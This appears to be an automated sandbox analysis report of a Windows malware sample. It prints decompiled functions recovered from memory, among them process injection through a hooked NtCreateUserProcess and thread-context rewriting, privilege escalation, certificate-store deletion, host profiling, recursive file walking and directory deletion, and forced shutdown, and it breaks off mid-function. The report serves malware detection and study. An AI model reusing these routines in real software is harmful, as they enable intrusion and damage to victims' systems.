0x00000000
0x00000000
0x00000000
0x0040ccf4
0x0040ccf4
0x0040ccf4
0x0040ccf7
0x0040ccfa
0x00000000
0x00000000
0x0040cd00
0x0040cd01
0x0040cd04
0x00000000
0x00000000
0x00000000
0x0040cd04
0x00000000
0x0040ccf4
0x0040cddd
0x0040cde2
0x00000000
0x00000000
0x00000000
0x0040cde2
0x0040cdeb
0x0040cdf7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CC9F
Process32FirstW.KERNEL32(000001E6,?), ref: 0040CCC8
OpenProcess.KERNEL32(00000400,00000000,?,?,?,74B5F560,00000000), ref: 0040CD23
CloseHandle.KERNEL32(00000000,00000000,?,?,74B5F560,00000000), ref: 0040CD40
GetLengthSid.ADVAPI32(00000000,?,74B5F560,00000000), ref: 0040CD53
CloseHandle.KERNEL32(?,?,74B5F560,00000000), ref: 0040CDC0
Process32NextW.KERNEL32(000001E6,0000022C), ref: 0040CDCC
CloseHandle.KERNEL32(000001E6,?,74B5F560,00000000), ref: 0040CDDD

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
String ID:
API String ID: 1981844004-0
Opcode ID: c6dd252536e6a693f50f88c2bd1e5f68a5863876f8c0340e1bc9243fbdd20ecf
Instruction ID: 779c559d07f9f014cbf0cbe52ea3665872bdec1b6fcba11b1068caca6213f35d
Opcode Fuzzy Hash: c6dd252536e6a693f50f88c2bd1e5f68a5863876f8c0340e1bc9243fbdd20ecf
Instruction Fuzzy Hash: 97414C30900119EBCF11AFA5DDC8AEEBB75EF85304F10067AE915B22A1E7355981CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004165E9, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E004165E9(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				void* _v1128;
				int _t51;
				signed int _t60;
				long _t68;
				signed char _t71;
				signed int _t83;

				_v1120 = __edx;
				_v1124 = __ecx;
				_t51 = E00416745("*",  &_v524, __ecx);
				if(_t51 == 0) {
					L25:
					return _t51;
				}
				_t51 = FindFirstFileW( &_v524,  &_v1116);
				_v1128 = _t51;
				if(_t51 != 0xffffffff) {
					_t71 = _a8;
					while(1) {
						_t83 = 0;
						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
							break;
						}
						if(E0041634A( &(_v1116.cFileName)) != 0) {
							L23:
							if(FindNextFileW(_v1128,  &_v1116) != 0) {
								continue;
							}
							break;
						}
						_t60 = _v1116.dwFileAttributes & 0x00000010;
						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
								goto L17;
							} else {
								goto L10;
							}
						} else {
							L10:
							if(_a4 <= _t83) {
								L17:
								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E00416745( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
									_t103 = _a24;
									if(_a24 != 0) {
										Sleep(_a24);
									}
									E004165E9( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
								}
								goto L23;
							}
							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
								_t83 = _t83 + 1;
								if(_t83 < _a4) {
									continue;
								}
								goto L17;
							}
							_t68 = _a12(_a16);
							__eflags = _t68;
							if(_t68 == 0) {
								break;
							}
							__eflags = _a28;
							if(_a28 != 0) {
								Sleep(_a28);
							}
							goto L17;
						}
					}
					_t51 = FindClose(_v1128);
				}
			}

0x00416606
0x0041660a
0x0041660e
0x00416615
0x0041673c
0x00416742
0x00416742
0x00416628
0x0041662e
0x00416635
0x0041663b
0x00416644
0x00416644
0x00416649
0x00000000
0x00000000
0x0041666b
0x0041671b
0x0041672c
0x00000000
0x00000000
0x00000000
0x0041672c
0x00416675
0x00416678
0x00416681
0x00000000
0x00000000
0x00000000
0x00000000
0x00416688
0x00416688
0x0041668b
0x004166c8
0x004166cd
0x004166ed
0x004166f1
0x004166f6
0x004166f6
0x00416716
0x00416716
0x00000000
0x004166cd
0x0041668d
0x004166a3
0x004166a7
0x00000000
0x00000000
0x00000000
0x004166a9
0x004166b6
0x004166b9
0x004166bb
0x00000000
0x00000000
0x004166bd
0x004166c1
0x004166c6
0x004166c6
0x00000000
0x004166c1
0x00416678
0x00416736
0x00416736

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

FindFirstFileW.KERNEL32(?,?,?,?,00000000,?,80000001), ref: 00416628
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0041664F
PathMatchSpecW.SHLWAPI(?,?), ref: 00416699
Sleep.KERNEL32(00000000), ref: 004166C6
Sleep.KERNEL32(00000000,?,?), ref: 004166F6
FindNextFileW.KERNEL32(?,?), ref: 00416724
FindClose.KERNEL32(?), ref: 00416736

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
String ID:
API String ID: 2348139788-0
Opcode ID: a5a14f667d4a8d8709f0b14f28a23be2a29d7af7ee93b5f4c8655a857c0a0d58
Instruction ID: 4cd700d4d81ca2384dc3eeb4b078877440d44b63d377371b38171bdb2e31b718
Opcode Fuzzy Hash: a5a14f667d4a8d8709f0b14f28a23be2a29d7af7ee93b5f4c8655a857c0a0d58
Instruction Fuzzy Hash: 97418D3100430A9BCF21DF14DD48ADF7BA9EF54358F02492AF9A4922A1D339D899CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004127D2, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004127D2(WCHAR* _a4) {
				void* _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v28;
				int _t23;

				_t23 = 0;
				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
					_v28.PrivilegeCount = 1;
					_v16 = 2;
					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
						_t23 = 1;
					}
					CloseHandle(_v12);
					return _t23;
				} else {
					return 0;
				}
			}

0x004127dd
0x004127f1
0x00412810
0x00412818
0x00412827
0x00412848
0x00412848
0x0041284d
0x00000000
0x00412805
0x00000000
0x00412805

APIs

GetCurrentThread.KERNEL32 ref: 004127E2
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB
LookupPrivilegeValueW.ADVAPI32(00000000,00404D8B,?), ref: 0041281F
AdjustTokenPrivileges.ADVAPI32(00404D8B,00000000,00000001,00000000,00000000,00000000), ref: 00412834
GetLastError.KERNEL32 ref: 0041283E
CloseHandle.KERNEL32(00404D8B), ref: 0041284D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
String ID:
API String ID: 2724707430-0
Opcode ID: c84846e603bb78d343a6e205f84c60f6e61a2207154e73c06b821be020bf8fa0
Instruction ID: d053ce17fd0c26bb80316417b87ceade86d27a27f07e404bc4057fb44912fd1d
Opcode Fuzzy Hash: c84846e603bb78d343a6e205f84c60f6e61a2207154e73c06b821be020bf8fa0
Instruction Fuzzy Hash: 2C011271600249BFEB106FA1DE89FEF7B7CEB14745F004165F501E1161E77489958A78

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9BB, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040E9BB(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32, intOrPtr _a36, intOrPtr _a40, void* _a44) {
				struct _CONTEXT _v720;
				void* __edi;
				void* __esi;
				intOrPtr _t32;
				void* _t36;
				void* _t37;
				void** _t45;
				void* _t46;
				void* _t47;
				void** _t50;
				void* _t52;
				void* _t53;
				signed int _t55;
				void* _t65;

				_t47 = __edx;
				_t45 = _a4;
				_t32 =  *0x41e5b4(_t45, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44);
				_a40 = _t32;
				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t45 != 0 && _a8 != 0 && E00406B23() != 0 && GetProcessId( *_t45) != 0) {
					_t36 = E00406946(_t46, _t47, _t35);
					_a44 = _t36;
					_t63 = _t36;
					if(_t36 != 0) {
						_push(_t52);
						_t37 = E00406A38(_t46,  *_t45, _t52, _t63, _t36, 0);
						_t50 = _a8;
						_t53 = _t37;
						_a32 = _t53;
						_t55 = _t53 -  *0x41e5a4 + E00407132;
						_v720.ContextFlags = 0x10003;
						if(GetThreadContext( *_t50,  &_v720) == 0) {
							L12:
							VirtualFreeEx( *_t45, _a32, 0, 0x8000);
						} else {
							_t65 = _v720.Eip -  *0x41e5bc; // 0x77e5ba60
							if(_t65 != 0) {
								goto L12;
							} else {
								if(( *0x41e590 & 0x00000010) != 0) {
									_t55 = _t55 ^ _v720.Eax;
								}
								_v720.Eax = _t55;
								_v720.ContextFlags = 0x10002;
								if(SetThreadContext( *_t50,  &_v720) == 0) {
									goto L12;
								}
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

0x0040e9bb
0x0040e9c8
0x0040e9e7
0x0040e9ed
0x0040e9f2
0x0040ea32
0x0040ea37
0x0040ea3a
0x0040ea3c
0x0040ea42
0x0040ea49
0x0040ea4e
0x0040ea51
0x0040ea59
0x0040ea65
0x0040ea6b
0x0040ea7d
0x0040eabf
0x0040eacb
0x0040ea7f
0x0040ea85
0x0040ea8b
0x00000000
0x0040ea8d
0x0040ea94
0x0040ea96
0x0040ea96
0x0040eaa5
0x0040eaab
0x0040eabd
0x00000000
0x00000000
0x0040eabd
0x0040ea8b
0x0040ead4
0x0040eadb
0x0040ea3c
0x0040eae1

APIs

NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0040E9E7

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

GetProcessId.KERNEL32(?), ref: 0040EA23

Part of subcall function 00406946: CreateMutexW.KERNEL32(0041E5C8,00000001,?,0041E808,74B5F560,?,00000002,?,74B5F560), ref: 00406997
Part of subcall function 00406946: GetLastError.KERNEL32 ref: 004069A3
Part of subcall function 00406946: CloseHandle.KERNEL32(00000000), ref: 004069B1

GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 0040EA75
SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 0040EAB5
VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 0040EACB
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040EAD4

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
String ID:
API String ID: 1044471028-0
Opcode ID: 2c965bc22dfb692c2b0263780bbae2de36922d61ea5139f9d534e458883e9f08
Instruction ID: c4b143df33c8a995bb6f2b32444ab5eb28bfc7e0a318a3a8f88880b89974c935
Opcode Fuzzy Hash: 2c965bc22dfb692c2b0263780bbae2de36922d61ea5139f9d534e458883e9f08
Instruction Fuzzy Hash: DE312431600219ABDF119FA6CD48BCA7BA9BF08318F058566FD09B62A1D779D860CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004123AB, Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(0041678C,00000000,00000000,00000001,F0000040,?,0041678C,?,00000030,?,?,?,00416D0C,00000000), ref: 004123C4
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,00416D0C,00000000), ref: 004123DC
CryptHashData.ADVAPI32(?,00000010), ref: 004123F8
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 00412410
CryptDestroyHash.ADVAPI32(?), ref: 00412427
CryptReleaseContext.ADVAPI32(?,00000000,?,?,00416D0C,00000000), ref: 00412431

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
String ID:
API String ID: 3186506766-0
Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction ID: 41b4f1345105fbec01d42ce5803d4bf471d973bf96d6e1a94b9266b88b5a4f31
Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
Instruction Fuzzy Hash: 3111097580024CBFEF129BA5EE88EEE7B7DFB04344F008461F551B1161C7768EA49B28

Uniqueness

Uniqueness Score: -1.00%

Function 004104D7, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E004104D7(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t66;
				signed int _t68;
				signed int _t69;
				signed short _t75;
				signed short _t79;
				void* _t96;
				void* _t99;
				void* _t101;
				signed short _t103;
				void* _t104;
				void* _t105;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr _t112;
				void* _t115;
				signed int _t117;
				char* _t118;
				void* _t119;

				_t115 = __edx;
				_t110 = __ecx;
				_t117 = _a4;
				_t120 =  *_t117;
				_t103 = 1;
				_v5 = 0;
				if( *_t117 == 0) {
					_t101 = E004167A1(_t120);
					 *_t117 = _t101;
					if(_t101 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t109 = 4;
						_v12 = 0x200099a;
						_t103 = E004167B5(_t117, _t109);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t103;
						if(_t103 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E00411106( *_t117);
								 *_t117 =  *_t117 & 0x00000000;
								__eflags =  *_t117;
							}
							L34:
							return _t103;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t103;
							if(_t103 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t103;
								if(_t103 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E00410423(_t110, _t117, 2);
									E00410423(_t110, _t117, 0x17);
									E00416862(E0040689F(), 0x41ea4e, _t115, __eflags, _t117, 0x2724);
									E0040688B();
									_t112 =  *0x41e804; // 0x0
									E004168A0(_t112, _t115, _t117);
								}
								goto L34;
							}
							_t66 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t66;
							__eflags = _t66;
							if(_t66 != 0) {
								__eflags = 0;
								 *((short*)(_t119 + _t66 * 2 - 0x248)) = 0;
								_t110 =  &_v588;
								_t103 = E00416862(_t66,  &_v588, _t115, 0, _t117, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t103;
							if(_t103 == 0) {
								goto L32;
							} else {
								_t68 =  &_v588;
								__imp__GetUserNameExW(2, _t68,  &_a4);
								__eflags = _t68;
								if(_t68 != 0) {
									_t69 = _a4;
									__eflags = _t69;
									if(_t69 != 0) {
										__eflags = 0;
										 *((short*)(_t119 + _t69 * 2 - 0x248)) = 0;
										_t110 =  &_v588;
										_t103 = E00416862(_t69,  &_v588, _t115, 0, _t117, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t118 =  &_v20;
						E004079A0(_t118);
						_push(_t118);
						_push(0x20000);
						_push(0x271c);
						_t104 = 6;
						_t75 = E004167B5(_a4, _t104);
						_t103 = _t75;
						__eflags = _t103;
						if(_t103 == 0) {
							_t117 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t75 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t105 = 2;
						_t79 = E004167B5(_a4, _t105);
						_t117 = _a4;
						_t103 = _t79;
						goto L20;
					}
					__eflags = _t103;
					if(_t103 == 0) {
						goto L32;
					}
					_v12 = E00411208();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t106 = 4;
					_t103 = E004167B5(_t117, _t106);
					__eflags = _t103;
					if(_t103 == 0) {
						goto L32;
					}
					_v12 = E00411230();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t107 = 4;
					_t103 = E004167B5(_t117, _t107);
					__eflags = _t103;
					if(_t103 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t108 = 4;
					_t103 = E004167B5(_t117, _t108);
					goto L16;
				}
				_t96 = E00406CC9(_t110,  &_v556);
				_t110 =  &_v552;
				_t103 = E00416862(_t96,  &_v552, _t115, __eflags, _t117, 0x2711);
				__eflags = _t103;
				if(_t103 == 0) {
					goto L11;
				}
				_t99 = E00406E29( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t110 =  &_v64;
					_t103 = E00416862(_t99,  &_v64, _t115, __eflags, _t117, 0x2712);
				}
				__eflags = _t103;
				if(_t103 == 0) {
					goto L11;
				}
				goto L9;
			}

0x004104d7
0x004104d7
0x004104e2
0x004104e5
0x004104e9
0x004104eb
0x004104ef
0x004104f1
0x004104f6
0x004104fa
0x00000000
0x004104fc
0x00410503
0x00410503
0x00410507
0x00410510
0x00410559
0x00410559
0x0041055d
0x00410562
0x00410563
0x00410564
0x0041056b
0x0041056e
0x0041057a
0x0041057a
0x0041057c
0x0041057c
0x00410580
0x004105f5
0x004105f5
0x004105f7
0x00410728
0x00410728
0x0041072c
0x00410730
0x00410735
0x00410735
0x00410735
0x00410738
0x00000000
0x00410738
0x004105fd
0x00410601
0x0041064f
0x0041064f
0x00410651
0x00000000
0x00000000
0x00410657
0x0041065b
0x004106e3
0x004106e3
0x004106e5
0x00000000
0x00000000
0x004106e7
0x004106eb
0x004106f0
0x004106f8
0x0041070d
0x00410712
0x00410717
0x0041071e
0x0041071e
0x00000000
0x004106eb
0x0041066f
0x00410675
0x00410678
0x0041067a
0x0041067c
0x00410683
0x0041068c
0x00410697
0x00410697
0x00410699
0x004106a0
0x004106a2
0x00000000
0x004106a8
0x004106ac
0x004106b5
0x004106bb
0x004106bd
0x004106bf
0x004106c2
0x004106c4
0x004106c6
0x004106cd
0x004106d6
0x004106e1
0x004106e1
0x004106c4
0x00000000
0x004106bd
0x004106a2
0x00410603
0x00410606
0x0041060d
0x00410611
0x00410612
0x00410619
0x0041061a
0x0041061f
0x00410621
0x00410623
0x00410725
0x00000000
0x00410725
0x00410629
0x00410632
0x00410638
0x0041063c
0x0041063d
0x00410644
0x00410645
0x0041064a
0x0041064d
0x00000000
0x0041064d
0x00410582
0x00410584
0x00000000
0x00000000
0x0041058f
0x00410595
0x00410596
0x00410597
0x0041059e
0x004105a6
0x004105a8
0x004105aa
0x00000000
0x00000000
0x004105b5
0x004105bb
0x004105bc
0x004105bd
0x004105c4
0x004105cc
0x004105ce
0x004105d0
0x00000000
0x00000000
0x004105dc
0x004105e2
0x004105e3
0x004105e4
0x004105eb
0x004105f3
0x00000000
0x004105f3
0x00410519
0x00410524
0x0041052f
0x00410531
0x00410533
0x00000000
0x00000000
0x00410539
0x0041053e
0x00410543
0x0041054b
0x00410553
0x00410553
0x00410555
0x00410557
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004105D6
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00410629
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 0041066F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 004106B5

Strings

, xrefs: 004106E7

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-3916222277
Opcode ID: 05f6999ad553beaf7b1e262a131d6b2a800b355242a5c670e568445c75be8dea
Instruction ID: b61aef10136e301a3ccd8a727a2c7d6d92bbef2c30c5576b43919b5b61e0c2d7
Opcode Fuzzy Hash: 05f6999ad553beaf7b1e262a131d6b2a800b355242a5c670e568445c75be8dea
Instruction Fuzzy Hash: 2661E831A412087AE710EF65D849FDE3BA89F01344F04805BBA44AF2D2DBBD99C5CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041652E, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041652E(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E00416745("*",  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E0041634A( &(_v596.cFileName)) == 0 && E00416745( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E0041621B( &_v1116);
						} else {
							E0041652E( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}

0x0041653c
0x00416550
0x004165cb
0x004165d1
0x004165e8
0x004165e8
0x00416565
0x0041656a
0x00000000
0x00000000
0x00000000
0x00000000
0x0041656c
0x0041656c
0x0041657a
0x00416592
0x0041659a
0x004165ac
0x0041659c
0x004165a0
0x004165a0
0x0041659a
0x004165c0
0x004165c5
0x00000000

APIs

Part of subcall function 00416745: PathCombineW.SHLWAPI(004063CA,004063CA,?,004063CA,?,?), ref: 00416764

FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041655F
FindNextFileW.KERNEL32(00000000,?), ref: 004165BA
FindClose.KERNEL32(00000000), ref: 004165C5
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 004165D1
RemoveDirectoryW.KERNEL32(?), ref: 004165D8

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
String ID:
API String ID: 765042924-0
Opcode ID: ccc2a7266b76de1c5751291083e188c13617f37091ac9507e112196c445a5527
Instruction ID: cfe1ffdb500f770d72ea71eb28d4fd10aa372431ac9313a26f07defe6ab8ac44
Opcode Fuzzy Hash: ccc2a7266b76de1c5751291083e188c13617f37091ac9507e112196c445a5527
Instruction Fuzzy Hash: E811E731004204ABC720FBA4ED4DAEF77ED9F85315F01452FFDA5D2194EB38D989865A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4F4, Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,004030F4), ref: 0040D4FF
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040D518
CertDeleteCertificateFromStore.CRYPT32(00000000), ref: 0040D523
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040D52B
CertCloseStore.CRYPT32(00000000,00000000), ref: 0040D537

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: a25e74c9813670f02db07325cdd3a6cc288abaa77481d8e78ff5ecb15df9f522
Instruction ID: 09c422542fca68a072a4d760d7fd531b1772b0f8b0e95c547efa7b48167a79df
Opcode Fuzzy Hash: a25e74c9813670f02db07325cdd3a6cc288abaa77481d8e78ff5ecb15df9f522
Instruction Fuzzy Hash: F8F0A73168111176C22117755D19BB7775CDB56B55F040033FE84F36A0CE3489498569

Uniqueness

Uniqueness Score: -1.00%

Function 0040D61F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D61F(void* __ebx, void* __ecx) {
				signed int _v124;
				signed char _t12;
				unsigned int _t15;

				_t12 =  *0x41eb54; // 0x0
				if((_t12 & 0x00000010) == 0) {
					__eflags = _t12 & 0x00000008;
					if(__eflags != 0) {
						E0040570F(__ebx, __ecx, __eflags);
						_t12 =  *0x41eb54; // 0x0
					}
					__eflags = _t12 & 0x00000003;
					if((_t12 & 0x00000003) == 0) {
						__eflags = _t12 & 0x00000004;
						if((_t12 & 0x00000004) != 0) {
							goto L8;
						}
						goto L9;
					} else {
						E004127D2(L"SeShutdownPrivilege");
						_t15 =  *0x41eb54; // 0x0
						__eflags = 0;
						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t15 >> 0x00000001 & 0x00000001, 0x80000000);
						return 0;
					}
				} else {
					_t12 = E00404A11( &_v124);
					if(_t12 != 0) {
						_v124 = _v124 | 0x00000020;
						 *0x41e590 =  *0x41e590 | 0x00000010;
						E00404A69( &_v124);
						L8:
						return ExitWindowsEx(0x14, 0x80000000);
					}
					L9:
					return _t12;
				}
			}

0x0040d622
0x0040d62c
0x0040d651
0x0040d653
0x0040d655
0x0040d65a
0x0040d65a
0x0040d65f
0x0040d661
0x0040d68c
0x0040d68e
0x00000000
0x00000000
0x00000000
0x0040d663
0x0040d668
0x0040d66d
0x0040d67f
0x0040d684
0x0040d68b
0x0040d68b
0x0040d62e
0x0040d632
0x0040d639
0x0040d63b
0x0040d63f
0x0040d64a
0x0040d690
0x00000000
0x0040d697
0x0040d69e
0x0040d69e
0x0040d69e

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040D684

Part of subcall function 00404A11: CreateMutexW.KERNEL32(0041E5C8,00000000,0041E408,?,?,0040F221,?,?,?,918317B5,00000002), ref: 00404A37

ExitWindowsEx.USER32(00000014,80000000), ref: 0040D697

Strings

SeShutdownPrivilege, xrefs: 0040D663
, xrefs: 0040D63B

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateExitInitiateMutexShutdownSystemWindows
String ID: $SeShutdownPrivilege
API String ID: 3829579691-2253681161
Opcode ID: d0e43b2ddbe7824f0c01ffb3f9e3529350da4123628ccddef23853ea0f46019e
Instruction ID: e6c83c3d2ef5464a633aef088971f93e9ab5a69278f3858186ead65f4fc95cc3
Opcode Fuzzy Hash: d0e43b2ddbe7824f0c01ffb3f9e3529350da4123628ccddef23853ea0f46019e
Instruction Fuzzy Hash: B4F0F97560430859EE10A7F55D46BEA3B6C9B40308F10083AEE82F32E2C67DA4459A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00415819, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00415819(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
